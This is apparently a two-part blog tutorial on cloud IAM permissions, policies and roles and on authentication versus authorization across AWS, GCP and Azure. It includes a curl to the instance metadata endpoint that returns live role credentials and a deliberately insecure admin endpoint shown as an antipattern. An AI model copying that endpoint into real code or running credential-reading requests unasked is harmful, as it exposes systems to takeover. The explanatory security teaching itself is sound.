Every cloud IAM system — AWS, GCP, Azure — is built on the same three primitives: permissions, policies, and roles. Learn these well and any cloud provider becomes readable. Skip them and you spend years pattern-matching without understanding why anything is structured the way it is.

What Is Cloud IAM established the foundation: IAM is the system that governs who can access what in cloud infrastructure, and its default answer is always deny. Authentication vs Authorization: AWS AccessDenied Explained drew the line between authentication — proving identity — and authorization — proving you’re allowed to act. This episode is about the authorization layer specifically. These three building blocks are how authorization is expressed in practice.

Before walking through each one, here’s what access control looks like without any of this structure — because that’s the fastest way to understand why the layers exist.

In 2015 I inherited an AWS account from a 12-engineer team that had been building for 18 months. When I ran aws iam list-attached-user-policies across the 23 users, 17 had policies attached directly to the user object — not to groups, not to roles.

One engineer had left six months earlier. His access key was still active. Three policies still attached: read access to prod S3, write to a DynamoDB table, ability to invoke Lambda functions. When I asked what the DynamoDB table was for, nobody could tell me. The Lambda functions no longer existed.

That account wasn’t built by negligent engineers. It was built by engineers reaching for whatever granted access fastest, under deadline, without a framework. Permissions scattered. Nothing tracked. Nothing removed.

Roles, policies, and permissions are the framework that prevents that. Understanding them is the difference between an IAM configuration you can audit in an afternoon and one that takes a week and still leaves you uncertain.

What Are IAM Permissions? The Atomic Unit of Access Control

A permission is a single action on a class of resources. It is the most granular thing you can grant or deny — the atom of access control.

Cloud providers express permissions differently, but the structure is consistent: a service, a resource type, and an action verb.

# AWS: service:Action
s3:GetObject               # read an object from S3
ec2:StartInstances         # start EC2 instances
iam:PassRole               # assign a role to an AWS service — one of the most dangerous
kms:Decrypt                # use a KMS key to decrypt

# GCP: service.resource.verb
storage.objects.get
compute.instances.start
iam.serviceAccounts.actAs  # impersonate a service account — equivalent risk to iam:PassRole
cloudkms.cryptoKeyVersions.useToDecrypt

# Azure: Provider/ResourceType/Action
Microsoft.Storage/storageAccounts/blobServices/containers/read
Microsoft.Compute/virtualMachines/start/action
Microsoft.Authorization/roleAssignments/write   # grant roles — highest risk
Microsoft.KeyVault/vaults/secrets/getSecret/action

You generally don’t assign individual permissions directly to identities — that’s like handing someone 47 keys with no labels and expecting the system to remain auditable. Permissions are grouped into policies.

What Are IAM Policies? Grouping Permissions with Conditions

A policy is a document that groups permissions and defines the conditions under which they apply.

AWS policy structure

An AWS policy document is JSON. Every field is a deliberate decision:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowReadS3Backups",
      "Effect": "Allow",
      "Action": ["s3:GetObject", "s3:ListBucket"],
      "Resource": [
        "arn:aws:s3:::company-backups",
        "arn:aws:s3:::company-backups/*"
      ],
      "Condition": {
        "StringEquals": { "s3:prefix": ["2024/", "2025/"] }
      }
    },
    {
      "Sid": "DenyDeleteEverywhere",
      "Effect": "Deny",
      "Action": "s3:DeleteObject",
      "Resource": "*"
    }
  ]
}

The Sid is a comment — use it. AllowReadS3Backups tells a future auditor why this statement exists. Statement1 is technical debt.

The Effect is either Allow or Deny. A Deny always wins — it cannot be overridden by any Allow anywhere in any policy on the same identity. If you have a Deny on s3:DeleteObject with "Resource": "*", nothing can grant delete access to that identity. This asymmetry is deliberate: it’s how guardrails work.

The Resource field is where access most often creeps wider than intended. "Resource": "*" on a write action means “every resource of this type in the account.” It works. It outlives the context that made it feel reasonable.

AWS policy types — which to reach for

┌──────────────────────────┬────────────────────────────┬────────────────────────────┐
│ Type                     │ Attached to                │ What it does               │
├──────────────────────────┼────────────────────────────┼────────────────────────────┤
│ Identity-based           │ User, Group, Role          │ What the identity can do   │
│ Resource-based           │ S3 bucket, KMS key, Lambda │ Who can touch this resource │
│ Permissions boundary     │ User or Role               │ Maximum possible — ceiling  │
│ Service Control Policy   │ AWS Org OU or Account      │ Org-level guardrail         │
│ Session policy           │ AssumeRole session         │ Restricts a specific session│
│ Resource Control Policy  │ AWS Org resources          │ Resource-level org guardrail│
└──────────────────────────┴────────────────────────────┴────────────────────────────┘

Critical: Permissions boundaries and SCPs do not grant permissions. They constrain them. A boundary that allows s3:* doesn’t mean the identity has S3 access. It means the identity can have at most S3 access, if an identity-based policy actually grants it. Many engineers set a boundary and expect it to work as a grant. It doesn’t.

GCP policy bindings

GCP doesn’t attach policy documents to identities. Each resource has an IAM policy — a set of bindings mapping roles to members:

{
  "bindings": [
    {
      "role": "roles/storage.objectViewer",
      "members": [
        "user:[email protected]",
        "serviceAccount:[email protected]"
      ]
    },
    {
      "role": "roles/storage.objectCreator",
      "members": ["serviceAccount:[email protected]"],
      "condition": {
        "title": "Business hours only",
        "expression": "request.time.getHours('America/New_York') >= 9 && request.time.getHours('America/New_York') < 18"
      }
    }
  ]
}

The mental model shift: in AWS you ask “what can this identity do?” by looking at the identity. In GCP you ask “who can access this resource?” by looking at the resource. The question runs in the opposite direction.

Azure role definitions

Azure separates what a role grants (role definition) from who gets it where (role assignment). Define once, assign at multiple scopes.

{
  "Name": "Custom Storage Reader",
  "IsCustom": true,
  "Actions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/read",
    "Microsoft.Storage/storageAccounts/blobServices/generateUserDelegationKey/action"
  ],
  "DataActions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read"
  ],
  "AssignableScopes": ["/subscriptions/SUB_ID"]
}

Actions vs DataActions catches people. Actions are control plane — you can see the storage account exists. DataActions are data plane — you can read actual blob contents. A user with Actions can list the container but cannot read a single byte without a DataAction. Both planes must be covered for the access to be complete.

What Are IAM Roles? The Layer That Scales Access Control

A role is a collection of policies assigned to identities. It’s the indirection layer that makes access manageable at scale.

Going back to the 2015 account: the problem wasn’t that engineers had access — they needed it. The problem was that access was scattered across 23 individual user objects with no shared structure. This is what what is cloud IAM establishes as the core problem IAM exists to solve. Roles are the structural answer.

The role model solves this:

Policy: S3ReadAccess (s3:GetObject, s3:ListBucket on s3:::app-data/*)
  ↓ attached to
Role: BackendDeveloper
  ↓ assigned to
Users: alice, bob, charlie, dave (and six more)

When the bucket changes  → update one policy
When someone joins       → assign one role
When someone leaves      → remove one role
Access model stays coherent because it's structured.

AWS roles — the identity that issues temporary credentials

AWS roles are themselves IAM identities, not just permission containers. When something assumes a role, it gets temporary credentials from STS. Two things must be configured:

Trust policy — who can assume:

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": { "Service": "ec2.amazonaws.com" },
    "Action": "sts:AssumeRole"
  }]
}

Without this, nobody can use the role regardless of its permissions. The trust policy is the gatekeeper.

Permission policy — what it can do:

aws iam create-role \
  --role-name AppServerRole \
  --assume-role-policy-document file://ec2-trust-policy.json

aws iam attach-role-policy \
  --role-name AppServerRole \
  --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

When debugging “why can’t this Lambda/EC2/ECS task do X?”, the first thing I check is the trust policy. Many times the permission policy is correct — the service simply isn’t in the trust policy and cannot assume the role at all.

GCP role types

┌──────────────────┬──────────────────────────────┬──────────────────────────────────┐
│ Type             │ Example                      │ When to use                      │
├──────────────────┼──────────────────────────────┼──────────────────────────────────┤
│ Basic/Primitive  │ roles/editor, roles/owner    │ Never in production              │
│ Predefined       │ roles/storage.objectViewer   │ Default — service-specific       │
│ Custom           │ Your org defines             │ When predefined is too broad     │
└──────────────────┴──────────────────────────────┴──────────────────────────────────┘

roles/editor at the project level grants write access to almost every GCP service. I’ve seen it granted “temporarily” and found it attached six months later. Always use predefined roles.

# Find the right predefined role
gcloud iam roles list --filter="name:roles/storage" --format="table(name,title)"

# See exactly what permissions it includes
gcloud iam roles describe roles/storage.objectViewer

# Create a custom role when predefined is still too broad
cat > custom-log-reader.yaml << 'EOF'
title: "Log Reader"
description: "Read application logs — nothing else"
stage: "GA"
includedPermissions:
  - logging.logEntries.list
  - logging.logs.list
  - logging.logMetrics.get
EOF
gcloud iam roles create LogReader --project=my-project --file=custom-log-reader.yaml

Azure built-in and custom roles

# List built-in roles containing "Storage"
az role definition list --output table | grep Storage

# View what a built-in role grants
az role definition list --name "Storage Blob Data Reader"

# Create a custom role
az role definition create --role-definition custom-app-storage.json

# Assign at a specific scope
az role assignment create \
  --assignee [email protected] \
  --role "Storage Blob Data Reader" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/\
Microsoft.Storage/storageAccounts/prodstore

RBAC vs ABAC: Which Access Control Model to Use

RBAC — Role-Based Access Control

The dominant model. Access flows from role membership:

alice     ∈ BackendDeveloper  →  s3:GetObject on app-data/*
bob       ∈ DataAnalyst       →  athena:* on analytics-queries
ci-runner ∈ DeployRole        →  ecr:PutImage, ecs:UpdateService

RBAC degrades two ways: role explosion (200 roles, nobody can explain what they all do) and coarse roles (avoid explosion by making roles broad, now BackendDeveloper has prod access with no distinction from dev). Both look the same on a spreadsheet — lots of access, no clear principle.

ABAC — Attribute-Based Access Control

ABAC grants access based on attributes of the principal, resource, or environment — not role membership. This one policy replaced 12 team-specific policies in one account:

{
  "Effect": "Allow",
  "Action": "ec2:*",
  "Resource": "*",
  "Condition": {
    "StringEquals": {
      "aws:ResourceTag/Team": "${aws:PrincipalTag/Team}"
    }
  }
}

An engineer tagged Team=Platform can only act on EC2 resources tagged Team=Platform. Add a new team — tag their resources and their identity. No new policy. No new role.

The risk is tag drift. If someone tags a resource incorrectly, the access model breaks silently. In practice, I use ABAC for environment and team scoping, and explicit policies for sensitive services like KMS and IAM. How these primitives combine in a full AWS account is covered in the AWS IAM deep dive.

Conditions — when context determines access

// Require MFA for any IAM or Organizations action
{
  "Effect": "Deny",
  "Action": ["iam:*", "organizations:*"],
  "Resource": "*",
  "Condition": { "BoolIfExists": { "aws:MultiFactorAuthPresent": "false" } }
}

// Restrict to corporate IP range
{
  "Effect": "Deny",
  "Action": "*",
  "Resource": "*",
  "Condition": {
    "NotIpAddress": { "aws:SourceIp": ["10.0.0.0/8", "172.16.0.0/12"] }
  }
}

The MFA condition is in every account I manage. A compromised API key without an MFA session can’t escalate IAM privileges — the Deny blocks it at the condition level. This single statement meaningfully reduces the blast radius of a credential compromise.

⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — Policies attached directly to users                 ║
║                                                                      ║
║  Feels fast. Creates the exact problem from 2015: access scattered  ║
║  across individual user objects with no shared structure.            ║
║  When the user leaves, their policies don't follow — they stay.     ║
║                                                                      ║
║  Fix: always use roles. Attach policies to roles. Assign roles to   ║
║  users. The role outlives the person.                               ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Using AWS managed policies in production            ║
║                                                                      ║
║  AmazonS3FullAccess grants s3:* on *. For a Lambda that reads one  ║
║  specific bucket, that's ~30 permissions you didn't need, all live. ║
║                                                                      ║
║  Fix: create customer managed policies scoped to the specific       ║
║  actions and ARNs the workload actually uses.                       ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — iam:PassRole with "Resource": "*"                   ║
║                                                                      ║
║  iam:PassRole lets an identity assign a role to an AWS service.     ║
║  With Resource: *, it can pass ANY role — including ones with more  ║
║  permissions than it currently has. That is a privilege escalation. ║
║                                                                      ║
║  Fix: always scope iam:PassRole to a specific role ARN:             ║
║  "Resource": "arn:aws:iam::ACCOUNT:role/SpecificRoleName"          ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 4 — Permissions boundary ≠ policy grant                 ║
║                                                                      ║
║  Setting a boundary that allows s3:* does NOT grant S3 access.     ║
║  The boundary is a ceiling — it limits maximum possible permissions. ║
║  The identity-based policy still needs to explicitly Allow the      ║
║  action. Both must be present for the access to work.               ║
╚══════════════════════════════════════════════════════════════════════╝

Cross-Cloud Rosetta Stone

Same concepts, different names and different directions. Bookmark this table.

┌─────────────────────────┬──────────────────────────┬──────────────────────────┬──────────────────────────┐
│ Concept                 │ AWS                      │ GCP                      │ Azure                    │
├─────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┤
│ Atomic permission       │ s3:GetObject             │ storage.objects.get      │ .../blobs/read           │
│ Permission document     │ Policy (JSON)            │ (built into role def)    │ Role Definition          │
│ Access grant            │ Policy attachment        │ IAM Binding              │ Role Assignment          │
│ Job-function identity   │ IAM Role                 │ Predefined Role          │ Built-in Role            │
│ Non-human identity      │ IAM Role (assumed)       │ Service Account          │ Managed Identity         │
│ Org-level guardrail     │ SCP                      │ Org Policy               │ Management Group Policy  │
│ Permission ceiling      │ Permissions Boundary     │ —                        │ —                        │
│ Session restriction     │ Session Policy           │ —                        │ —                        │
│ Attribute-based grant   │ Tag conditions in policy │ IAM Conditions           │ Conditions in assignment │
└─────────────────────────┴──────────────────────────┴──────────────────────────┴──────────────────────────┘

Quick Reference

┌──────────────────────────┬────────────────────────────────────────────────────────────┐
│ Term                     │ What it is                                                 │
├──────────────────────────┼────────────────────────────────────────────────────────────┤
│ Permission               │ Atomic: one action on one resource class                   │
│ Policy                   │ Document grouping permissions + conditions                 │
│ Role (AWS)               │ Assumable identity — carries policies, issues temp creds   │
│ Trust policy (AWS)       │ Who can assume this role — separate from permissions       │
│ Permissions boundary     │ Ceiling — limits max possible permissions; does not grant  │
│ SCP                      │ Org guardrail — constrains all identities in scope         │
│ IAM Binding (GCP)        │ Maps a role to a member on a specific resource             │
│ Role Assignment (Azure)  │ Grants a role definition at a specific scope               │
│ ABAC                     │ Access by tag/attribute — one policy replaces many roles   │
│ RBAC                     │ Access by role membership — clean until roles proliferate  │
│ iam:PassRole             │ Privilege escalation vector — always scope to specific ARN │
└──────────────────────────┴────────────────────────────────────────────────────────────┘

Commands to know:
┌────────────────────────────────────────────────────────────────────────────────┐
│  # AWS — list policies attached to a role                                     │
│  aws iam list-attached-role-policies --role-name MyRole                       │
│                                                                                │
│  # AWS — view what a managed policy actually grants                           │
│  aws iam get-policy-version \                                                  │
│    --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess \              │
│    --version-id v1                                                             │
│                                                                                │
│  # AWS — who can assume this role?                                            │
│  aws iam get-role --role-name MyRole --query 'Role.AssumeRolePolicyDocument'  │
│                                                                                │
│  # GCP — view the IAM policy on a project                                    │
│  gcloud projects get-iam-policy PROJECT_ID --format=json                      │
│                                                                                │
│  # GCP — list all roles and what permissions they include                    │
│  gcloud iam roles describe roles/storage.objectViewer                         │
│                                                                                │
│  # Azure — list role assignments in a subscription                           │
│  az role assignment list --all --output table                                 │
│                                                                                │
│  # Azure — view exactly what a built-in role grants                          │
│  az role definition list --name "Storage Blob Data Reader"                   │
└────────────────────────────────────────────────────────────────────────────────┘

Framework Alignment

Framework	Reference	What It Covers Here
CISSP	Domain 5 — Identity and Access Management	RBAC and ABAC are the implementation models for authorization at scale
CISSP	Domain 1 — Security & Risk Management	Role design implements separation of duties and least privilege
ISO 27001:2022	5.15 Access control	Access control policy — roles and policies are the mechanism
ISO 27001:2022	5.18 Access rights	Provisioning, review, and removal of access rights — roles make this auditable
ISO 27001:2022	8.2 Privileged access rights	Permissions boundaries and conditions applied to elevated access
SOC 2	CC6.1	Logical access security — policy documents are the technical implementation
SOC 2	CC6.3	Access revocation — role-based model makes removal consistent and auditable

Key Takeaways

Permissions are atomic — one action on one resource class. Policies group permissions. Roles carry policies for assignment
AWS roles have two required configs: trust policy (who can assume) and permission policy (what it can do) — both must be correct
GCP binds roles to resources; AWS attaches policies to identities — the mental model runs in opposite directions
Azure separates role definition (what) from role assignment (who, where) — define once, assign at multiple scopes
RBAC scales through role design; ABAC scales through tag/attribute conditions — use ABAC where roles would proliferate
iam:PassRole and iam.serviceAccounts.actAs are privilege escalation vectors — scope them to specific ARNs, never *
Conditions add context (MFA, IP, tags, time) to policies — the MFA condition on IAM actions is essential in every account

What’s Next

EP04 goes deep on AWS IAM — the most complex of the three cloud models. Policy evaluation order, cross-account trust, permissions boundaries in practice, SCPs, and IAM Identity Center for human access. We’ll work through the patterns that make AWS IAM maintainable at production scale.

Next: AWS IAM Deep Dive: Users, Groups, Roles, and Policies Explained

Get the AWS IAM deep dive in your inbox when it publishes → linuxcent.com/subscribe

Authentication vs Authorization: AWS AccessDenied Explained

May 10, 2026April 14, 2026 by Vamshi Krishna Santhapuri

Reading Time: 10 minutes

What Is Cloud IAM → Authentication vs Authorization → IAM Roles vs Policies → AWS IAM Deep Dive → GCP Resource Hierarchy IAM → Azure RBAC Scopes

TL;DR

Authentication asks are you who you claim to be? Authorization asks are you allowed to do this? — two separate gates, two separate failure modes
AWS AccessDenied is an authorization failure — the identity authenticated fine; fix the policy, not the credentials
Prefer short-lived credentials (STS temporary tokens, Managed Identities) over long-lived access keys — the difference is the blast radius window
MFA strengthens authentication; it does nothing for authorization — a hijacked session with broad permissions is just as dangerous with or without MFA on the original login
HTTP 401 = authentication failure; HTTP 403 = authorization failure — the code tells you which gate to debug
Both layers must enforce least privilege independently — application-layer authorization is not a substitute for tight cloud IAM

The Big Picture

Every API call in the cloud passes through two gates before it executes. Most engineers know the first one. The second is where most security failures live.

  THE TWO GATES — every cloud API call passes through both, in order

  ┌──────────────────────────────────────────────────────────────────┐
  │  GATE 1 — AUTHENTICATION                                         │
  │  "Are you who you claim to be?"                                  │
  │                                                                  │
  │  IAM user     →  Access Key + Secret (long-lived, rotatable)    │
  │  IAM role     →  Temporary STS token (expires automatically)    │
  │  Human        →  Password + MFA via console or IdP              │
  │  Service      →  Instance profile / Managed Identity / OIDC     │
  │                                                                  │
  │  Passes → move to Gate 2                                        │
  │  Fails  → stopped here, HTTP 401                                │
  └──────────────────────────────────────────────────────────────────┘
                                 │
                                 ▼
  ┌──────────────────────────────────────────────────────────────────┐
  │  GATE 2 — AUTHORIZATION                                          │
  │  "Are you allowed to do what you're trying to do?"               │
  │                                                                  │
  │  Evaluated against: identity-based policies · SCPs              │
  │                     resource-based policies · conditions         │
  │                     permissions boundaries · session policies    │
  │                                                                  │
  │  Default answer: DENY (explicit Allow required every time)      │
  │                                                                  │
  │  Passes → request executes                                      │
  │  Fails  → AccessDenied / HTTP 403                               │
  └──────────────────────────────────────────────────────────────────┘

  MFA hardens Gate 1. It has zero effect on Gate 2.
  A hijacked session with a valid token clears Gate 1 automatically.
  Gate 2 is your last line of defense — and the one that's most often misconfigured.

Introduction

The authentication vs authorization distinction is the most commonly confused boundary in cloud security — and the source of most misdirected debugging when an AWS AccessDenied error appears. These are two separate gates, two separate failure modes, and two entirely different fixes.

Early in my career I wrote an API endpoint I was proud of. Token validation. Rejection of unauthenticated requests. I called it “secured” in the code review.

A senior engineer asked one question: “What happens if I take a valid token from a regular user and call your /admin/delete-user endpoint?”

I ran the test. It worked. Any employee — with a perfectly valid, properly issued token — could delete any user account in the system.

The authentication was correct. The authorization didn’t exist.

That gap between proving who you are and proving you’re allowed to do this is where a surprising number of security incidents live. Not just in application code — in cloud IAM too.

I’ve reviewed AWS environments where MFA was enforced on every human account, access keys were rotated quarterly, and yet a Lambda function had s3:* on * because whoever wrote the deployment script reached for AmazonS3FullAccess and moved on.

Gate 1 was solid. Gate 2 was wide open.

This episode draws the boundary cleanly — what each gate is, how each cloud implements it, and the specific failure modes that happen when the two get conflated.

How Authentication Works in Cloud IAM

Authentication answers: are you who you claim to be?

The three factor types

Authentication has not fundamentally changed in decades. What has changed is how cloud platforms implement it.

Factor	Type	Cloud Examples
Something you know	Knowledge	Password, access key secret, PIN
Something you have	Possession	TOTP app, FIDO2 hardware key, smart card
Something you are	Inherence	Biometrics — less common in cloud contexts

MFA requires two distinct factors. A password plus a username is not MFA — both are knowledge factors. A password plus a TOTP code is MFA. Worth stating clearly because I’ve seen internal documentation describe “username and password” as two-factor authentication.

SMS codes count as MFA, but they’re the weakest form. SIM-swapping attacks — convincing a carrier to port your number — have been used to defeat SMS MFA on high-value accounts. If TOTP or FIDO2 hardware keys are available, use them.

How AWS authenticates

AWS has two fundamentally different identity classes:

Human identities authenticate via console (password + optional MFA) or CLI/API (Access Key ID + Secret Access Key). The access key is a long-lived credential with no default expiry. Every .env file with an access key, every git commit that included one, every CI/CD log that printed one — that credential is live until someone explicitly rotates or deletes it.

Machine identities — EC2, Lambda, ECS tasks — authenticate via temporary credentials issued by STS:

# Assume a role — get temporary credentials that expire
aws sts assume-role \
  --role-arn arn:aws:iam::123456789012:role/DevRole \
  --role-session-name alice-session \
  --duration-seconds 3600
# Returns: AccessKeyId + SecretAccessKey + SessionToken
# All three expire together. Nothing to rotate.

# From inside an EC2 instance — credentials arrive automatically via IMDS
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/MyAppRole
# Returns: AccessKeyId, SecretAccessKey, Token, Expiration
# AWS refreshes these before expiry. The application never sees a rotation event.

The IMDS model is the right one. The application never manages a credential — it appears, it’s used, it expires. If it leaks, it’s usable for hours at most, not years.

Why Long-Lived Credentials Keep Appearing

How GCP authenticates

GCP cleanly separates human and machine authentication.

Humans authenticate via Google Account or Workspace (OAuth2). The gcloud CLI handles the flow:

gcloud auth login                        # browser-based OAuth2 for humans
gcloud auth application-default login    # sets up Application Default Credentials for local dev

Machine identities use service accounts, ideally attached to the resource rather than using downloaded key files. Key files are GCP’s equivalent of long-lived AWS access keys — same problems, same risks.

# From inside a GCE VM — ADC uses the attached service account, no key file needed
gcloud auth print-access-token
# Use it: curl -H "Authorization: Bearer $(gcloud auth print-access-token)" ...

How Azure authenticates

Azure’s identity plane is Entra ID (formerly Azure Active Directory). Humans authenticate via Entra ID using OAuth2/OIDC. Machine identities use Managed Identities — Azure handles the entire credential lifecycle, nothing to configure or rotate.

az login                                  # browser-based OAuth2
az login --service-principal \            # service principal for automation
  -u APP_ID -p CERT_OR_SECRET \
  --tenant TENANT_ID

# From inside an Azure VM — get a token via IMDS, no credentials needed
curl 'http://169.254.169.254/metadata/identity/oauth2/token\
?api-version=2018-02-01&resource=https://management.azure.com/' \
  -H 'Metadata: true'

The credential failure modes that repeat everywhere

In practice, the same patterns appear across all three clouds in every audit:

Leaked credentials — access keys in git commits, .env files, Docker image layers, CI/CD logs. GitHub’s secret scanning finds thousands of these monthly on public repos alone.

Long-lived credentials — an access key from 2019 is still valid in 2026 unless someone explicitly rotated it. I’ve audited accounts where 30% of access keys had never been rotated, some five years old.

Shared credentials — one key used by three services. When you revoke it, three things break. When it leaks, you can’t tell which service was the source.

Credential sprawl — service account keys downloaded for “one quick test” and never deleted. I once found seventeen key files for a single GCP service account, created by different engineers over two years. None rotated. Five belonged to accounts that no longer existed.

The direction of travel in all three clouds is credential-less: workload identity federation, managed identities, instance profiles. We’ll cover this specifically in OIDC Workload Identity: Eliminate Cloud Access Keys Entirely.

How Authorization Evaluates Every API Call

Authorization happens after authentication. The system knows who you are — now it decides what you can do. This decision is enforced through IAM roles vs policies — the building blocks that express what each identity is allowed to do on which resources.

What the evaluation looks like

Every API call triggers an authorization check. You don’t notice when it succeeds. You notice when it fails:

REQUEST:
  Action:    s3:DeleteObject
  Resource:  arn:aws:s3:::prod-backups/2024-01-15.tar.gz
  Principal: arn:aws:iam::123456789012:role/DevEngineerRole
  Context:   { source_ip: "10.0.1.5", mfa: false, time: "14:32 UTC" }

EVALUATION:
  1. Explicit Deny anywhere? → none found
  2. Explicit Allow in any policy? → not granted
  3. Default → DENY

RESULT: AccessDenied

The engineer authenticated successfully. Valid credentials, valid session. But DevEngineerRole has no policy granting s3:DeleteObject on that bucket. Gate 1 passed. Gate 2 denied. They are evaluated independently.

Policy evaluation chains by cloud

AWS — evaluated in layers, explicit Deny wins at any layer:

1. Explicit Deny in any SCP?           → DENY (cannot be overridden anywhere)
2. No SCP Allow?                       → DENY
3. Explicit Deny in identity or resource policy? → DENY
4. Resource-based policy Allow?        → can ALLOW (same account)
5. Permissions boundary — no Allow?    → DENY
6. Session policy — no Allow?          → DENY
7. Identity-based policy Allow?        → ALLOW
Default (nothing granted):             → DENY

The default is always Deny. Every successful authorization is an explicit "Effect": "Allow" somewhere in the chain. This is the opposite of traditional Unix — in the cloud, if you didn’t explicitly grant it, it doesn’t exist.

GCP — additive, permissions accumulate up the hierarchy:

Permission granted if ANY binding grants it at:
  resource level → project level → folder level → organization level

IAM Deny Policies can override all grants (newer feature).
No binding at any level? → Denied.

Azure RBAC:

1. Explicit Deny Assignment?           → DENY (even Owner can't override)
2. Role Assignment with Allow?         → ALLOW
Default:                               → DENY

Why Confusing Authentication and Authorization Breaks Security

The token-as-authorization antipattern

An application checks for a valid JWT and if found, proceeds. The JWT proves the user authenticated with the IdP. However, it says nothing about what they’re allowed to do.

# This is authentication only — anyone with a valid token gets through
@app.route("/admin/delete-user", methods=["POST"])
def delete_user():
    token = request.headers.get("Authorization")
    if verify_token(token):           # asks: is this token real and unexpired?
        delete_user_from_db(...)      # executes for any valid token holder
        return "OK"
    return "Unauthorized", 401

# This separates the two correctly
@app.route("/admin/delete-user", methods=["POST"])
def delete_user():
    token = request.headers.get("Authorization")
    principal = verify_token(token)                    # Gate 1: authentication
    if not has_permission(principal, "users:delete"):  # Gate 2: authorization
        return "Forbidden", 403
    delete_user_from_db(...)
    return "OK"

The short-expiry principle

Credential type	Provider	Typical lifetime	Risk
Access Key + Secret	AWS	Permanent (until deleted)	Years of exposure if leaked
STS Temporary Token	AWS	15 min – 12 hours	Hours at most
OAuth2 Access Token	GCP / Azure	~1 hour	Short window
IMDS Token (VM)	All three	Minutes	Auto-refreshed by platform

A credential that expires in an hour has a one-hour exposure window if stolen. A credential that never expires has an unlimited window. This is the operational argument for managed identities and instance profiles, beyond just convenience.

# AWS — configure max session duration at role level
aws iam update-role \
  --role-name MyRole \
  --max-session-duration 3600   # 1 hour max

# GCP — access tokens expire in ~1 hour automatically
gcloud auth print-access-token
# Refresh: gcloud auth application-default print-access-token

# Azure — token lifetime configurable in Entra ID token policies
az account get-access-token --resource https://management.azure.com/

⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — "We have MFA, so permissions can be broad"          ║
║                                                                      ║
║  MFA protects Gate 1 only. If a session is hijacked after login    ║
║  (via malware, SSRF, or a stolen session cookie), the attacker has  ║
║  a valid, MFA-authenticated token. Gate 1 is already cleared.       ║
║  Broad permissions in Gate 2 are the full attack surface.           ║
║                                                                      ║
║  Fix: treat Gate 2 (IAM policy) as your primary blast-radius        ║
║  control. MFA buys time. Least privilege limits damage.             ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Debugging AccessDenied by rotating credentials      ║
║                                                                      ║
║  AWS AccessDenied is an authorization failure. The identity         ║
║  authenticated successfully — there's no Allow in the policy.       ║
║  Rotating the access key does nothing.                              ║
║                                                                      ║
║  Fix: check the policy chain. Use simulate-principal-policy to      ║
║  confirm where the Allow is missing before touching credentials.    ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — Application-layer authZ with broad cloud IAM        ║
║                                                                      ║
║  "The app controls access" is not a substitute for scoped cloud     ║
║  IAM. An SSRF vulnerability, exposed debug endpoint, or            ║
║  compromised dependency bypasses the application layer entirely.    ║
║  The cloud identity's permissions become the attacker's surface.    ║
║                                                                      ║
║  Fix: both layers enforce least privilege independently.            ║
╚══════════════════════════════════════════════════════════════════════╝

Authentication vs Authorization Audit Checklist

Split your IAM review along the authN/authZ boundary — they’re different problems with different fixes.

Authentication — Gate 1:
– Are there long-lived access keys that could be replaced with STS/Managed Identity?
– Is MFA enforced for all human identities with console or API access?
– Are service account key files present where workload identity is available?
– Are credentials stored in a secrets manager — not in code, .env files, or repos?
– When did each long-lived credential last rotate?

Authorization — Gate 2:
– Does every policy follow least privilege — only the permissions the workload actually uses?
– Are there wildcards (s3:*, "Resource": "*") that could be narrowed?
– Are write, delete, and IAM-modification actions scoped to specific resources?
– Are SCPs or permissions boundaries capping maximum permissions at org or account level?
– When were each role’s permissions last reviewed against actual usage (Access Analyzer)?

Quick Reference

┌────────────────────────────┬──────────────────────────────────────────────────┐
│ Term                       │ What it means                                    │
├────────────────────────────┼──────────────────────────────────────────────────┤
│ Authentication (AuthN)     │ Verifying identity — are you who you claim?      │
│ Authorization (AuthZ)      │ Verifying permission — are you allowed to act?   │
│ MFA                        │ Two distinct factors; strengthens Gate 1 only    │
│ STS (AWS)                  │ Security Token Service — issues temp credentials │
│ Access Key                 │ Long-lived AWS credential; avoid for services    │
│ Instance profile (AWS)     │ Container attaching a role to EC2                │
│ Managed Identity (Azure)   │ Credential-less identity for Azure services      │
│ Service Account (GCP)      │ Machine identity; prefer attached over key file  │
│ HTTP 401                   │ Authentication failure — prove who you are       │
│ HTTP 403 / AccessDenied    │ Authorization failure — fix the policy           │
└────────────────────────────┴──────────────────────────────────────────────────┘

Commands to know:
┌──────────────────────────────────────────────────────────────────────────────┐
│  # AWS — assume a role and get temporary credentials                        │
│  aws sts assume-role --role-arn arn:aws:iam::ACCOUNT:role/ROLE \            │
│    --role-session-name my-session --duration-seconds 3600                   │
│                                                                              │
│  # AWS — simulate a policy to debug AccessDenied before touching anything   │
│  aws iam simulate-principal-policy \                                         │
│    --policy-source-arn arn:aws:iam::ACCOUNT:role/MyRole \                   │
│    --action-names s3:GetObject \                                             │
│    --resource-arns arn:aws:s3:::my-bucket/*                                 │
│                                                                              │
│  # AWS — check what credentials your session is using                       │
│  aws sts get-caller-identity                                                 │
│                                                                              │
│  # GCP — print the current access token (expires in ~1 hour)                │
│  gcloud auth print-access-token                                              │
│                                                                              │
│  # GCP — show which account ADC is using                                    │
│  gcloud auth application-default print-access-token                         │
│                                                                              │
│  # Azure — get current token for ARM                                         │
│  az account get-access-token --resource https://management.azure.com/       │
│                                                                              │
│  # Azure — check who you're logged in as                                     │
│  az account show                                                             │
└──────────────────────────────────────────────────────────────────────────────┘
